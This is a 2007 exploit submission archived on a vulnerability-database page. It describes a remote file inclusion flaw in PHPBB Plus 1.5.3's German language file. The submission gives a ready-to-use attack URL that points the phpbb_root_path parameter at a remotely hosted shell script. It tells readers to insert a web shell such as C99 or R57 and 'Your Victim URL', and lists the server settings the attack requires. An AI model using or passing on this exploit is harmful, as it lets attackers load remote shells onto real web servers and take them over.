Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18026
HistorySep 19, 2007 - 12:00 a.m.

PHPBBPLUS 1.5.3 RFI BUG

2007-09-1900:00:00
vulners.com
9
JSON

Hi Milw0rm .
My Name ( AUTHOR ) Is = Mehrad Ansari Targhi
My E-Mail : [email protected]
My Yahoo Messenger ID : mehrad_1989
Please Instert My Name And E-Mail And My Yahoo Messenger In The Exploit .
I Found a Bug In PHPBB PLUS 1.53 .
This Is A RFI Bug .
This Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang_main_album.php
Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=
Just Replace http://Shell.txt With Your Script Source Address Like C99 Or R57 Or … And Replace [PHPPLUS] With Your Victim URL And Remove [] From The Exploit .
Register Global Must Be On , On The Server .
Remote File Inc. Must Be On , On The Server .
German Language Must Be Installed .

JSON